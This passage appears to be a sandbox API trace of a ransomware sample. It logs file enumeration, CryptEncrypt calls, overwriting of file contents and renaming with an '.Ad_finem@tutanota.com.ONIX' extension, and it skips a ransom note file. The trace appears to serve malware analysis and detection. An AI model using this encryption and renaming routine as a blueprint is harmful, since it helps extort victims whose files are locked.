Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0071.243] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1565) returned 1 [0071.243] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x61d [0071.243] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0071.243] GetProcessHeap () returned 0x410000 [0071.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0071.243] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0071.243] WriteFile (in: hFile=0x474, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0071.245] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0071.246] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0071.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x61d) returned 0x4b5b28 [0071.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x61d) returned 0x4b6150 [0071.248] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.248] ReadFile (in: hFile=0x474, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x61d, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x61d, lpOverlapped=0x0) returned 1 [0071.248] SetFilePointer (in: hFile=0x474, lDistanceToMove=-1565, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.248] WriteFile (in: hFile=0x474, lpBuffer=0x4b6150*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6150*, lpNumberOfBytesWritten=0x367f44c*=0x61d, lpOverlapped=0x0) returned 1 [0071.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0071.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6150 | out: hHeap=0x410000) returned 1 [0071.249] UnlockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x61d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0071.249] CloseHandle (hObject=0x474) returned 1 [0071.250] GetProcessHeap () returned 0x410000 [0071.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0071.250] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0071.253] GetProcessHeap () returned 0x410000 [0071.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0071.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0071.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0071.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0071.253] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0071.253] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0071.253] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0071.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0071.253] GetLastError () returned 0x0 [0071.253] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x474 [0071.253] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0071.253] LockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8f8, nNumberOfBytesToLockHigh=0x0) returned 1 [0071.253] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.254] ReadFile (in: hFile=0x474, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0071.255] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.255] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.255] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0071.255] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0071.255] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0071.256] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0071.256] GetProcessHeap () returned 0x410000 [0071.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0071.256] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" [0071.256] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0071.256] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2296) returned 1 [0071.256] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x8f8 [0071.256] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0071.256] GetProcessHeap () returned 0x410000 [0071.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0071.256] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0071.256] WriteFile (in: hFile=0x474, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0071.258] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0071.259] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0071.260] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f8) returned 0x4b5b28 [0071.260] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f8) returned 0x4b6428 [0071.260] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.260] ReadFile (in: hFile=0x474, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x8f8, lpOverlapped=0x0) returned 1 [0071.260] SetFilePointer (in: hFile=0x474, lDistanceToMove=-2296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.260] WriteFile (in: hFile=0x474, lpBuffer=0x4b6428*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6428*, lpNumberOfBytesWritten=0x367f44c*=0x8f8, lpOverlapped=0x0) returned 1 [0071.261] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0071.261] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6428 | out: hHeap=0x410000) returned 1 [0071.261] UnlockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8f8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0071.261] CloseHandle (hObject=0x474) returned 1 [0071.262] GetProcessHeap () returned 0x410000 [0071.263] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0071.263] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0071.265] GetProcessHeap () returned 0x410000 [0071.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0071.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0071.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0071.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0071.265] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bcff70, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0071.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0071.265] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0071.265] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0071.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0071.265] GetLastError () returned 0x0 [0071.265] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bcff70, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0071.265] CloseHandle (hObject=0x3cc) returned 1 [0071.266] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0071.266] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0xa, wMilliseconds=0x335)) [0071.266] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0071.266] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.266] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.266] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0071.266] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0071.267] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.267] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.267] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0071.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0071.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458308 | out: hHeap=0x410000) returned 1 [0071.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0071.267] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e930 [0071.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0071.267] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0071.267] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0071.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0071.267] GetLastError () returned 0x0 [0071.268] FindNextFileW (in: hFindFile=0x48e930, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0071.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0071.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0071.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0071.268] GetLastError () returned 0x0 [0071.268] FindNextFileW (in: hFindFile=0x48e930, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0071.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0071.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0071.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0071.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0071.268] GetLastError () returned 0x0 [0071.268] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x478 [0071.268] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0071.268] LockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x263400, nNumberOfBytesToLockHigh=0x0) returned 1 [0071.268] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.268] ReadFile (in: hFile=0x478, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0071.270] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.270] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.270] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0071.270] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0071.270] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", dwFileAttributes=0x80) returned 1 [0071.270] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 81 [0071.271] GetProcessHeap () returned 0x410000 [0071.271] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x112) returned 0x4b5b28 [0071.271] lstrcpyW (in: lpString1=0x4b5b28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" [0071.271] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0071.271] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2503680) returned 1 [0071.271] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x263400 [0071.271] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0071.271] GetProcessHeap () returned 0x410000 [0071.271] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0071.271] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0071.271] WriteFile (in: hFile=0x478, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0071.858] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0071.859] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0071.860] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x263400) returned 0x3680020 [0071.861] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x263400) returned 0x38f0020 [0071.861] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.861] ReadFile (in: hFile=0x478, lpBuffer=0x3680020, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x263400, lpOverlapped=0x0) returned 1 [0072.244] UnlockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x263400, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0072.244] CloseHandle (hObject=0x478) returned 1 [0072.313] GetProcessHeap () returned 0x410000 [0072.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0072.313] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0072.316] GetProcessHeap () returned 0x410000 [0072.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0072.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0072.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0072.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0072.316] FindNextFileW (in: hFindFile=0x48e930, 